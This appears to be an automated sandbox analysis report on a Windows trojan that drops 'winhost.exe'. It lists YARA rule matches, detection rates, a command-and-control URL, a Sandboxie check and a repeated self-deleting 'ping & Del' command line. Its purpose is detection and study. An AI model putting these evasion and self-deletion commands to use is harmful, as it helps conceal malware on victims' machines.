                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeCode function: 12_2_00007FFA35FBEE3E12_2_00007FFA35FBEE3E
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.671450742.000000001D610000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.671450742.000000001D610000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.671684796.000000001D690000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.669454149.000000001B9B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670799707.000000001D510000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.664276739.00000000009C6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesvchost.exel% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.664620301.0000000000F19000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.665147725.0000000001120000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWindows.Storage.dll.MUIj% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.708565650.000000001D170000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWindows.Storage.dll.MUIj% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.697302028.0000000000826000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesvchost.exel% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.703488772.000000001B870000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.708176857.000000001D110000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.708125368.000000001D0B0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.708125368.000000001D0B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.707413981.000000001CFB0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.697548514.0000000000D96000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeBinary or memory string: OriginalFilenamesvchost.exel% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeSection loaded: sbiedll.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: sbiedll.dllJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeSection loaded: sbiedll.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: sbiedll.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: sbiedll.dll
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeVirustotal: Detection: 68%
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeMetadefender: Detection: 52%
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeReversingLabs: Detection: 85%
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile read: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeJump to behavior
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: winhost.exe.0.dr, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: 8.0.winhost.exe.720000.0.unpack, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: 8.2.winhost.exe.720000.0.unpack, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: winhost.exe.12.dr, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: 19.0.winhost.exe.160000.0.unpack, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: 19.2.winhost.exe.160000.0.unpack, svchost/MainController.csSuspicious URL: 'http://gpay-safe.ru/x/'
                  Source: unknownProcess created: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: unknownProcess created: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000 Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000 Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile created: C:\Users\user\AppData\Local\Temp\MicrosoftJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/11@5/3
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: 19.2.winhost.exe.160000.0.unpack, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 19.2.winhost.exe.160000.0.unpack, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: winhost.exe.12.dr, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: winhost.exe.12.dr, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
